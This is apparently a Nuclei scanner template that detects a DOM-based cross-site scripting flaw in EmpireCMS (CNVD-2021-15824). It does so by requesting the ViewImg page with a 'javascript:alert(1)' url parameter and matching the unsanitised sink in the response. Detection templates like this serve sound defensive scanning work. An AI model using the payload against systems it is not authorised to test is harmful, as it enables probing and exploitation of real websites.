id: CNVD-2021-15824

info:
  name: EmpireCMS DOM Cross Site-Scripting
  author: daffainfo
  severity: high
  description: EmpireCMS is vulnerable to a DOM based cross-site scripting attack.
  reference:
    - https://sourceforge.net/projects/empirecms/
    - https://www.bilibili.com/read/cv10441910
    - https://vul.wangan.com/a/CNVD-2021-15824
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 1
  tags: Empire Software - Empirecms

http:
  - method: GET
    path:
      - "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(1)"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'if(Request("url")!=0)'
          - 'href=\""+Request("url")+"\"'
        condition: and

      - type: status
        status:
          - 200

# digest: 4a0a0047304502203e06312e9eb7cfefb0336c65464fc2d81850da4cf51c2ac81d08b45a6e25ddf4022100fe267f5ff1ff112c74f78a99b9b09615d6db107d2309868b244de244bde560dc:922c64590222798bb761d5b6d8e72950
